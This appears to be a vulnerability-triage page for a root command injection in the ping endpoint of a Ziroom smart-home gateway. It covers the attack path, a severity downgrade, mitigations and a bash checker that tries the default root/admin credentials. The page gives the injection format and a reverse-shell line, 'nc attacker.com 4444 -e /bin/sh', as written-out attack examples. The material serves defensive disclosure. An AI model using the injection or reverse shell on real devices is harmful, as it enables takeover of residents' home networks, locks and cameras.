← Back to Feed CACHED · 2026-09-30 06:52:25 · CACHE_KEY CVE-2026-102794
CVE-2026-102794 · CWE-74 · Disclosed 2026-09-30

A vulnerability has been found in Ziroom ZHOME A0101 1.0.1.0.

ASSESSED — NOISGATE
Vendor
—
—
—
Reassessed
—
—
—
Verdict: —
Do you agree?
01 · The Real Story

Like leaving the master key under the doormat of a building nobody in your city lives in

The Ziroom ZHOME A0101 (ZH-A0101) is an OpenWrt-based smart-home gateway shipped exclusively into Ziroom-managed rental apartments across mainland China. Firmware 1.0.1.0 (Build 202004151405) exposes a LuCI web API on the LAN at 192.168.18.1. CVE-2026-102794 targets the POST /api/ZRnetwork/ping endpoint: the url parameter is concatenated directly into a shell ping command in zrNetwork.lua (line 1112) without sanitization, so $(arbitrary_command) achieves full OS command execution as root. Affected: firmware ≤ 1.0.1.0. No patched firmware exists — the vendor is unresponsive.

The vendor-assigned CVSS 3.1 of 9.1 CRITICAL dramatically overstates the real-world enterprise risk. The vector itself encodes PR:H — the exploit's own PoC confirms you must authenticate as root via HTTP Basic Auth and obtain a session token (stok) before reaching the vulnerable endpoint. The 'network' attack vector is misleading: the management interface sits on a private LAN, not the public internet. Ziroom is a China-domestic rental platform with zero deployment in Western or global enterprise networks. Even within Ziroom's ecosystem, exploiting this requires LAN access to one apartment's gateway — the blast radius caps at that apartment's IoT devices and /24.

"Consumer IoT gateway for Chinese rental apts — not in your fleet, not your problem."
02 · The Attack Path

4 steps from start to impact.

STEP 01

Gain LAN access to the apartment network

The ZHOME A0101 management interface binds to 192.168.18.1 on the apartment's private LAN. The attacker must be on the same Layer 2 segment — physically present, connected via a compromised IoT device, or via rogue Wi-Fi association. No internet-facing exposure has been documented on Shodan, Censys, or FOFA.
Conditions required:
  • Physical or wireless proximity to the specific Ziroom apartment
  • The target apartment must contain a ZHOME A0101 gateway
Where this breaks in practice:
  • Enterprise networks do not deploy this device
  • Attacker must target a specific Chinese rental apartment
  • Device is not internet-facing — LAN-only at 192.168.18.1
Detection/coverage: No enterprise scanner covers this device. Shodan dork http.title:"Ziroom" returns negligible results.
STEP 02

Authenticate as root on the LuCI web interface

The exploit requires HTTP Basic Auth with the root account and extraction of a stok session token. The PoC from researcher 'Waltz' uses username=root&password=admin (factory default). The login endpoint is POST /cgi-bin/luci. If default credentials have been changed, this step fails entirely.
Conditions required:
  • Default credentials unchanged (root/admin), or possession of valid admin credential
  • Network reachability from Step 1
Where this breaks in practice:
  • PR:H authentication gate — not pre-auth
  • If credentials are changed from factory defaults, the chain breaks completely
  • No credential-stuffing path — only one known default pair
Detection/coverage: Failed auth attempts logged in /tmp/log/ on the device; no SIEM integration exists.
STEP 03

Send command-injection payload to /api/ZRnetwork/ping

With a valid stok token, the attacker POSTs to /cgi-bin/luci/;stok=<TOKEN>/api/ZRnetwork/ping with url=$(arbitrary_command). The Lua handler concatenates input directly into ping "..url.." -c 1 -W 1 |grep avg, executing the injected command via shell substitution. The web process runs as root. Weaponized tool: curl with the waltz-sketch PoC payloads.
Conditions required:
  • Valid authenticated session from Step 2
  • The /api/ZRnetwork/ping endpoint is enabled (default)
Where this breaks in practice:
  • Trivial once authenticated — single curl command
  • Public PoC on GitHub (waltz-sketch/Ziroom)
Detection/coverage: No IDS/IPS signatures for this endpoint. No Nuclei template. No Nessus/Qualys plugin. Device has no external logging.
STEP 04

Establish persistence or pivot on the apartment LAN

With root shell on the OpenWrt gateway, the attacker can install a reverse shell (nc attacker.com 4444 -e /bin/sh), read Wi-Fi credentials, DHCP leases, and connected-device MACs, or pivot to other devices on the apartment /24. Blast radius: smart locks, cameras, thermostats, personal devices on the same Wi-Fi.
Conditions required:
  • Successful command execution from Step 3
  • Outbound connectivity for C2 callbacks
Where this breaks in practice:
  • Blast radius is one apartment's LAN — no domain, no AD, no fleet
  • No enterprise-scale lateral movement possible
  • Gateway has limited storage for persistent implants
Detection/coverage: Egress monitoring at the ISP or apartment router is the only viable detection. No enterprise tooling applies.
03 · Compensating Control

1
LOW 3.0→IGNORE 1.0
SEVERITY REDUCED
Change default root credentials on the device — The PoC depends on factory root/admin creds. Changing the password breaks Step 2, eliminating the exploit path. As a LOW verdict, there is no noisgate mitigation SLA — treat as backlog hygiene.
2
LOW 3.0→LOW 2.0
Isolate the gateway on a dedicated IoT VLAN — Place the ZHOME A0101 on a segmented VLAN with no route to corporate networks. Block management-interface access (192.168.18.1:80) from non-management segments. Limits blast radius to IoT-only devices. No mitigation SLA for LOW — backlog hygiene.
3
LOW 3.0→IGNORE 0.5
SEVERITY REDUCED
Disable /api/ZRnetwork/ping via upstream firewall rule — If the ping diagnostic is not needed, block HTTP POST to /cgi-bin/luci/*/api/ZRnetwork/ping at the device's upstream firewall or via iptables on the device. Eliminates the specific injection vector entirely.
4
LOW 3.0→LOW 2.5
Block outbound connections from the gateway — Deny egress except required smart-home cloud services. Prevents reverse-shell callbacks and C2 even if command injection succeeds. Attacker achieves blind execution but cannot exfiltrate or persist.
What doesn't work
  • Enterprise EDR/AV: The device runs embedded OpenWrt Linux — no endpoint agent can be installed. EDR is irrelevant.
  • Cloud/enterprise WAF: The management interface is on a private LAN IP, not behind a reverse proxy. A WAF will never see this traffic.
  • Firmware patching: No patch exists. Vendor is unresponsive. No firmware update mechanism addresses this CVE.
  • Vulnerability scanning (Nessus/Qualys/Rapid7): No detection plugins exist for this device. It will not appear in enterprise scan results.
04 · Intelligence Metadata

The supporting signals.

In-the-wild exploitationNo known exploitation. Not on CISA KEV. No campaigns observed. No GreyNoise tags.
Proof-of-conceptPublic. Full PoC with curl commands by researcher Waltz at waltz-sketch/Ziroom. Includes auth, file creation, id output, and reverse-shell payloads. Not on pocindex.io. No Nuclei template, no Metasploit module.
EPSS scoreNot yet scored — CVE published 2026-09-29; EPSS typically lags 24–72 hours. Expected low given niche device and no exploitation history.
KEV statusNot listed. No CISA KEV entry as of 2026-09-30.
CVSS vectorCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H → 9.1 Critical. PR:H = admin auth required. S:C = gateway → LAN pivot. CVSS 4.0: 9.4 per VulDB.
Affected versionsZiroom ZHOME A0101 (ZH-A0101) firmware ≤ 1.0.1.0 (Build 202004151405). No other firmware versions documented.
Fixed versionsNone. Vendor unresponsive — no patch, no advisory, no firmware update path.
Scanning / exposureNo Shodan/Censys/GreyNoise/FOFA footprint. Management interface at private LAN 192.168.18.1. Shodan dork http.title:"Ziroom" returns negligible hits. No Nessus/Qualys/Rapid7 detection plugins.
Disclosure date2026-09-29 (VulDB submission #914644). CVE published 2026-09-30. NVD analysis pending.
ResearcherWaltz (GitHub: waltz-sketch). Submitted via VulDB. Also filed CVE-2026-102792 and CVE-2026-102793 for adjacent endpoints on the same device.

Sources.

  1. VulDB — CVE-2026-102794
  2. waltz-sketch/Ziroom PoC on GitHub
  3. TheHackerWire — CVE-2026-102794 Analysis
  4. Strix.ai — CVE-2026-102794
  5. ThreatInt — CVE-2026-102794
  6. OffSeq Threat Radar — CVE-2026-102794
  7. SentinelOne — CVE-2026-1803 (related default-creds CVE)
  8. Dusun IoT — Ziroom Partnership
05 · The Call

Final Verdict
↓ DOWNGRADED to LOW (3.0/10)

Why this verdict

  • Near-zero enterprise installed base: The ZHOME A0101 is a consumer IoT gateway deployed exclusively in Ziroom-managed Chinese rental apartments. The probability that a Western enterprise fleet contains even one is effectively zero.
  • LAN-only reachability (−2.0): The management interface at 192.168.18.1 is not internet-facing. The CVSS AV:N is technically correct but misleading — the 'network' is one apartment's /24. No Shodan/Censys exposure. Attacker needs physical/wireless proximity.
  • PR:H authentication gate (−1.5): Exploit requires root-level HTTP Basic Auth plus session token. Factory defaults (root/admin) soften this, but CVSS correctly flags PR:H. This is post-auth command injection, not pre-auth RCE.
  • Single-apartment blast radius (−2.0): Successful exploitation compromises one apartment's IoT devices and LAN. No lateral movement to domain, fleet, cloud tenant, or supply chain. S:C reflects gateway-to-LAN pivot only.
  • Role multiplier: This device occupies no high-value enterprise role. It is not an identity provider, hypervisor, CI/CD system, backup server, network edge appliance, SIEM, OT controller, or domain controller. It is a consumer smart-home hub for lights, locks, and thermostats. The high-value role floor does NOT apply. Blast radius: apartment LAN → handful of IoT devices and personal endpoints.

Why not higher?

To reach MEDIUM, we would need either meaningful enterprise deployment or a realistic path to fleet-scale impact. Neither exists. The device is absent from enterprise asset inventories globally. The chain requires physical/LAN proximity to a specific Chinese apartment, admin credentials, and yields only apartment-level compromise. No high-value role floor applies — the device is consumer IoT with zero enterprise-infrastructure overlap.

Why not lower?

The vulnerability is real, the PoC is public and trivial with default credentials, the vendor is unresponsive with no patch, and command injection as root on a LAN gateway enables apartment-level lateral movement. For organizations operating Ziroom properties or conducting IoT assessments, this is a legitimate finding. It does not merit IGNORE because the technical impact within its limited scope is genuine.

06 · Verification

Crowdsourced verification payload.

Run from any Linux/macOS host on the same LAN as the ZHOME A0101 gateway. Usage: bash check_cve_2026_102794.sh 192.168.18.1. No privileges required — it only attempts HTTP requests to detect the vulnerable endpoint and default credentials. Does NOT inject commands.

noisgate-verify.sh
BASHREAD-ONLYSAFE
#!/usr/bin/env bash
# check_cve_2026_102794.sh — Detect CVE-2026-102794 (Ziroom ZHOME A0101 ping cmd injection)
# Usage: bash check_cve_2026_102794.sh <target_ip>
# Output: VULNERABLE / PATCHED / UNKNOWN
# Requires: curl, grep
# Does NOT exploit the vulnerability — only checks endpoint reachability and default creds.

set -euo pipefail

TARGET="${1:-192.168.18.1}"
PORT="${2:-80}"
BASE="http://${TARGET}:${PORT}"
RESULT="UNKNOWN"

echo "[*] CVE-2026-102794 checker for Ziroom ZHOME A0101"
echo "[*] Target: ${BASE}"

# Step 1: Check if the device is reachable
if ! curl -s -o /dev/null -w '' --connect-timeout 5 "${BASE}/" 2>/dev/null; then
    echo "[-] Target unreachable at ${BASE}"
    echo "UNKNOWN"
    exit 2
fi
echo "[+] Target is reachable"

# Step 2: Attempt login with default credentials
LOGIN_RESP=$(curl -s -D - -o /dev/null --connect-timeout 10 \
    -X POST "${BASE}/cgi-bin/luci" \
    -d "username=root&password=admin" \
    -L 2>/dev/null || true)

STOK=$(echo "${LOGIN_RESP}" | grep -oP 'stok=\K[^/;\r\n]+' | head -1 || true)
COOKIE=$(echo "${LOGIN_RESP}" | grep -i '^set-cookie:' | grep -oP 'sysauth=[^;]+' | head -1 || true)

if [ -z "${STOK}" ] || [ -z "${COOKIE}" ]; then
    echo "[-] Default credentials (root/admin) rejected or login endpoint differs"
    echo "[*] Device may exist but default creds changed — not directly exploitable"
    echo "UNKNOWN"
    exit 2
fi
echo "[!] Default credentials ACCEPTED — stok token obtained"

# Step 3: Check if the vulnerable endpoint exists (safe probe, no injection)
PING_RESP=$(curl -s -o /dev/null -w "%{http_code}" --connect-timeout 10 \
    -X POST "${BASE}/cgi-bin/luci/;stok=${STOK}/api/ZRnetwork/ping" \
    -b "${COOKIE}" \
    --data-urlencode "url=127.0.0.1" 2>/dev/null || echo "000")

if [ "${PING_RESP}" = "200" ]; then
    echo "[!] /api/ZRnetwork/ping endpoint EXISTS and responds"
    echo "[!] Firmware is vulnerable to CVE-2026-102794 (no patch exists)"
    RESULT="VULNERABLE"
elif [ "${PING_RESP}" = "404" ] || [ "${PING_RESP}" = "403" ]; then
    echo "[+] /api/ZRnetwork/ping returned ${PING_RESP} — may be disabled"
    RESULT="PATCHED"
else
    echo "[?] Unexpected HTTP ${PING_RESP} from ping endpoint"
    RESULT="UNKNOWN"
fi

echo "${RESULT}"
case "${RESULT}" in
    VULNERABLE) exit 1 ;;
    PATCHED)    exit 0 ;;
    *)          exit 2 ;;
esac
Peer Review

What defenders are saying.

Submit a review attribution: handle + country only
0 flags selected · stored anonymously